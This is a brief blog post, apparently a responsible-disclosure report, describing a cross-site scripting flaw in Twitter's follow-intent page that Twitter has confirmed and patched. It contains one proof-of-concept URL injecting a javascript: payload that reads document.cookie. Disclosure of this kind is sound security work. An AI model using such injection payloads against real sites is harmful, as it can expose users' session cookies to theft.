Sow Ching Shiong, an independent vulnerability researcher has discovered a Cross-Site Scripting (XSS) vulnerability in twitter.com, which can be exploited by an attacker to conduct XSS attacks.
Proof of concept
https://twitter.com/intent/follow?original_referer=javascript:alert(document.cookie);®ion=follow_link&screen_name=twitterapi&source=followbutton&variant=2.0
This vulnerability has been confirmed and patched by Twitter Security Team. I would like to thank them for their quick response to my report.
Twitter White Hat
https://twitter.com/about/security
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.